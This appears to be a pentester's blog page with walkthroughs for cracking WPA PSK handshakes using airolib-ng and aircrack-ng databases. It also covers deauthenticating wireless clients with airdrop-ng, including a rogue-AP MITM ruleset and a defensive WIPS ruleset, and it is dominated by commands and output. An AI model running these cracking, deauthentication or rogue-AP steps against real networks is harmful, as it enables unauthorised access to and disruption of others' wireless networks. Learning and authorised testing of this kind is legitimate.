Below is a bunch of ways to inter-operate between pyrit/cowpatty/jtr with various attacking and exporting techniques. I recently figured these out while having to juggle all kinds of cracking issues. A few weeks ago I was performing a wireless pentest and came up across a rather standard WPA PSK network. However, this came with issues that spawned into learning a bunch of new command line usages for various tools in conjunction with one another.
Showing posts with label wireless. Show all posts
Showing posts with label wireless. Show all posts
Tuesday, January 18, 2011
WPA JTR/Pyrit/cowpatty uses and cracking interoperability
Below is a bunch of ways to inter-operate between pyrit/cowpatty/jtr with various attacking and exporting techniques. I recently figured these out while having to juggle all kinds of cracking issues. A few weeks ago I was performing a wireless pentest and came up across a rather standard WPA PSK network. However, this came with issues that spawned into learning a bunch of new command line usages for various tools in conjunction with one another.
Friday, February 19, 2010
Airolib-ng WPA cracking walk through
I use to crack my WPA passwords with cowpatty precomputed hashes, but another way to crack WPA with hashed values is to create airolib databases with lists of SSID’s and Passwords. Airolib will create these databases with SQLite3. This is convenient because you can have more than one SSID and Password list in each database. If you are in an area with multiple SSID’s running WPA you can note all of the SSID’s in a list and import them into the database. This is great because when doing a packet capture in an environment with multiple WPA encrypted networks, the attacker can crack any of the 4way Authentication Handshakes with the same database file. Below is a play by play of cracking a WPA wireless network using the airolib/aircrack method.
Create SSID list:
Create Password List:
Clean Database:
Note: I assume you already have a packet capture of a handshake.... If not just run airodump until you obtain a handshake, or for the sake of practice you can just turn your victim card on and off to catch a capture while airodump is running on that channel. I also assume you know the old way of cracking wpa.. If not I can post a guide on how to do that...
Setting up the databases:
First you need to create a SQLite3 database and import some SSID’s to the new database. If no database is already created then Airolib will create one for you automatically. Create a list of SSID’s from your Airodump output. Then use the Airolib command in the following format.
Airolib-ng --import essid
Create SSID list:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --import essid ssidlist.txt
Database does not already exist, creating it...
Database sucessfully created
Reading file...
Writing...
Done.
Next import your password list into the same database with the same format as when you added SSID’s to the database but replacing the keyword to passwd and adding your password list. Here is the format for this followed by an example.
Airolib-ng --import
Create Password List:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --import passwd passwords.txt
Reading file...
Writing...
Done.
This next command is an optional command called “clean” that will run integrity checks on the database and reduce the size of your database if possible.
Clean Database:
Example:
root@ ficti0n:~# airolib-ng wpaDatabase --clean all
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
integrity_check
ok
Query done. 2 rows affected.
Done.
Create your PMK’s:
After you have imported all your SSID’s and Passwords you can create PMK hashes with the following command.
root@ ficti0n:~# airolib-ng wpaDatabase --batch
Computed 21 PMK in 0 seconds (21 PMK/s, 0 in buffer). All ESSID processed.
Cracking:
Now that you have databases of PMK hashes for the WPA SSID’s in your area you can run a crack against your Output cap file to retrieve your password. If all goes well and the networks password is in your database you are done.
Example:
root@ ficti0n:~# aircrack-ng -r wpaDatabase Output-02.cap
Opening Output-02.cap
Read 3347 packets.
# BSSID ESSID Encryption
1 00:18:F8:66:7E:CC ficti0nAP WPA (1 handshake)
Choosing first network as target.
Opening Output-02.cap
Aircrack-ng 1.0 r1645
[00:00:00] 1 keys tested (240.91 k/s)
KEY FOUND! [ MyPassword ]
Master Key : 81 91 38 43 93 E5 28 6C 38 3F 3A 79 88 06 53 80
67 D5 24 01 6B BD 44 E6 5B D3 78 92 CE 85 66 60
Transient Key : A1 91 0B E1 2D 1C D9 31 73 A1 2B 7B 51 4E E6 C0
FE A9 61 49 0E B1 0B 19 76 D6 54 9D A4 4B 7B E3
00 05 DB 2B 90 0E DF DB F7 AB D2 53 26 6C E5 C9
1B 4B 73 1D 9D 94 15 9D 1E 51 79 94 F8 64 97 67
EAPOL HMAC : 15 55 71 33 DB A8 2C 6F 82 74 1E BF 70 72 1B F0
Quitting aircrack-ng...
Optional:
Another useful option if you want to crack all the WPA networks but you want to set the priority on a specific network you can run this sql command to set that priority in the database. Try the following command to set your network as a priority.
root@ficti0n:~# airolib-ng wpaDatabase --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="ficti0nAP";'
Query done. 1 rows affected.
Monday, February 15, 2010
Airdrop-ng Basics on BT4 Final
De-Authentication and Client Manipulation
Over the last few days I have been playing with Airdrop-NG, it seems like a simple yet effective wireless attack tool. I have had some issues with its functionality, but these issues might be AP related and it seemed to be more consistently working after installing psyco. Below are my notes on using Airdrop-ng and also the information from schmoocon 2010. This tool should to be released to the public in a week or so and has a lot of potential. I will post more info later as I explore Airdrop-NG's functionality. This is just some basic usage. More advanced uses and coding projects to follow.
Description:
Airdrop-NG is a wireless de-authentication tool released at schmoocon 2010 which can also double as a poor man's WIPS depending on your intentions. Airdrop-NG is a rule based tool that is simple to configure and easy to use. Each rules file can allow or deny traffic using Client Stations MAC's, BSSID's and a few other descriptors. Rules can be updated while the program is running in a loop making for easy on the fly changes within your attack. On each loop Airdrop-NG reparse’s the rules file and continues sending packets based on a CSV output from Airodump-ng.
Below will be a walkthrough of setting up the tool on BT4 and configuring it to attack a single client station against his BSSID. The install scripts and configurations are intuitive and quick to get working. I had zero install issues on BT4 Final. Pre Final however did give me problems.
Install airdrop-ng:
root@ficti0n:~/# cd airdrop-ng
root@ficti0n:~/# airdrop-ng python install.py
Checking for dependancies used by the installer...
All dependancies installed! Continuing...
#### NOTE: For Ubuntu based distro's,
python2.6-dev must be installed. Please
make sure it is installed before continuing!
Welcome to the airdrop-ng installer!
You will be prompted for installing
Airdrop-ng, lorcon, and pylorcon.
Continue with installer? (y/n): y
Install airdrop-ng? (y/n): y
Build exist?
Didn't exist. Creating...
Files copied. Now, moving to directory...
Moving airdrop-ng to /usr/bin, lib to
/usr/lib/airdrop-ng, and installing man pages...
airdrop-ng installed! =)
Would you like to install lorcon? (y/n): y
Running svn co http://802.11ninja.net/svn/lorcon/branch/lorcon-old. This may tak
e a while...
A lorcon-old/rt2500inject.h
A lorcon-old/lorcon_decode.c
A lorcon-old/lorcon_packasm.h
A lorcon-old/tx80211_errno.h
A lorcon-old/Makefile.in
A lorcon-old/rt73inject.h
A lorcon-old/madwifing_control.c
..........................
.................................................
copying build/lib.linux-i686-2.5/pylorcon.so -> /usr/lib/python2.5/site-packages
running install_egg_info
Removing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Writing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Clean up? (y/n): y
Operation(s) complete! May the source be with you. =)
Install Psyco for more power:
root@ficti0n:~/# apt-get install python-psyco
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
python-psyco
0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
Need to get 270kB of archives.
After this operation, 766kB of additional disk space will be used.
Get:1 http://archive.offensive-security.com pwnsauce/universe python-psyco 1.6-1 [270kB]
Fetched 270kB in 2s (122kB/s)
Selecting previously deselected package python-psyco.
(Reading database ... 225714 files and directories currently installed.)
Unpacking python-psyco (from .../python-psyco_1.6-1_i386.deb) ...
Setting up python-psyco (1.6-1) ...
Setup Wireless Interface:
root@ficti0n:~/# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
5757 dhclient3
Interface Chipset Driver
wlan0 RTL8187 rtl8187 - [phy0]
(monitor mode enabled on mon0)
Switch to another shell and run airodump: (leave airodump running)
root@ficti0n:~/# airodump-ng -w Test --output-format csv mon0
CH 6 ][ Elapsed: 10 mins ][ 2010-02-15 18:30 ][ WPA handshake: 02:1F:38:65:AE:EF
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:5B:6B:4E:6C:6F -1 26 1 0 11 54 . WEP WEP Testing
02:1F:28:65:AE:ED -24 489 391 0 1 54e WPA2 CCMP PSK ficti0nsAP
00:0B:85:6C:2D:4F -71 48 0 0 1 54 . WEP WEP Linksys
00:1B:85:6E:2D:4D -72 48 0 0 1 54 . WEP WEP
06:0B:85:6C:7D:4E -71 45 0 0 1 54 . OPN
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 02:16:08:AD:6E:95 -67 0 - 1 0 3
(not associated) 00:A0:F8:B8:DF:69 -73 0 - 1 120 39 Linksys
(not associated) 00:24:36:74:F1:97 -53 0 - 1 0 57
02:0B:65:4E:6C:62 02:17:6B:20:00:ED -72 0 - 1 124 27
02:1F:28:65:AE:ED 00:23:4E:DF:AE:70 0 54e- 1e 979 444
02:1F:28:65:AE:ED 00:21:00:DB:60:00 -28 0 - 1 67 91 ficti0nsAP
02:1F:28:65:AE:ED 00:21:6A:11:0E:52 -38 1e- 2e 0 212 ficti0nsAP
02:1F:28:65:AE:ED 00:2E:45:9F:87:AC -38 1e- 6e 0 194 ficti0nsAP
02:1F:28:65:AE:ED 00:23:3E:DF:ED:ED -42 54e- 1 0 63 ficti0nsAP
02:1F:28:65:AE:ED 00:25:08:AD:50:7C -51 54e-24 0 2
02:1F:28:65:AE:ED 00:1E:C2:C4:E5:79 -67 1e- 1 0 94 ficti0nsAP
Edit the example rules file:
You will need some rules that Airdrop-NG can use when attacking clients, I will explain a bit about the rules form the schmooo presentation then we will add a rule to our rules.conf.
Rules are broken down into 3 fields: (Action/ap|clients):
2 options for state field:
-Allow
-Deny
5 options for AP field:
-ESSID
-BSSID
-Company OUI name value
-Company OUI numeric value
-any
5 options for clients field
-mac
-multiple macs (ex. mac1,mac2,mac3)
-Company OUI name value
-Company OUI numeric value
-any
Add your rule Example:
Below is a rule that denys all traffic to the following client "01-23-5E-DF-AE-50" from a specified BSSID
Example Deny Rule:
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
Rule explanation:
d = deny
/
|
Run airdrop with new rule: (Leave airodump running during this!!)
Now run Airodrop-NG with the rules file you created above and your CSV output file from airodump-ng. Airdrop-NG will continuously loop through the rules file every second until you terminate the process. This will hopefully keep your victim from having network access.
root@ficti0n:~/# python airdrop-ng.py -b -i mon0 -t /root/Test-01.csv -r docs/dropRules.conf
#################################################
# Welcome to AirDrop-ng #
#################################################
Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid
Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops
Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid
Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops
Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid
.....................
...............................
Airdrop-ng will now exit
Sent 164 Packets
Exiting Program, Please take your card mon0 out of monitor mode
Poor Man’s WIPS:
Now for the defensive portion of this walkthrough. Let’s say you want to keep your client stations from roaming over to an evil Fon or a Karma AP. You can try this with the following setup.
Create a list of your station MAC's:
11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66
Create the list of your AP BSSID's:
AB:AD:F2:14:00:00
EA:CF:DF:AD:00:00
Rules:
Create a WIPS Rules file with the following rules
Allow 3 clients to talk to AB:AD:F2:14:00:00
a/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66
Allow 3 clients to talk to EA:CF:DF:AD:00:00
a/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66
Deny those 3 clients to any other access points
d/any|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66
MITM Attacks:
An attempted example from Schmoocon was an attack on clients via MITM. This example wasn’t shown during the demo because the presenters couldn’t get their monitors working correctly.. But I imagine the ruleset would be to deny all clients’ access to the legitimate BSSID's within your airodump output and allow them all access to your KARMA or perhaps FON AP. The presenters had their own FonRules which I am guessing would go something similar to the following, but I could be way off, this however should function similarly to what I think they were going to show us.
Make a list of local BSSID's:
AB:AD:F2:14:00:00
EA:CF:DF:AD:00:00
FON MAC:
AB:CD:EF:12:34:56
Add In some new rules:
Deny 3 clients to talk to AB:AD:F2:14:00:00
d/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66
Deny 3 clients to talk to EA:CF:DF:AD:00:00
d/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66
Allow Access to my evil AP's:
a/AB:CD:EF:12:34:56|any
I have a couple other ideas for IDS monitoring combining other tools and also some malicious MITM I am messing around with that I will post in future posts... so far Airdrop-ng is a fun tool... enjoy...
--Ficti0n
Subscribe to:
Posts (Atom)
Bypassing Alarm Systems - Alarm System Labs CTF Walkthrough
Walking through bypassing physical alarm systems and re-wiring them via free online labs you can follow along and get practice with. Enj...
-
"Swan song" is a metaphorical phrase for a final gesture, effort, or performance given just before death or retirement. This post ... -
Firstly this post requires the following song to be playing. http://www.youtube.com/watch?v=wVfjwIyc-CU Now that we got that out of... -
A few months ago I noticed that Citrix provides virtual appliances to test their applications, I decided to pull down an appliance and ...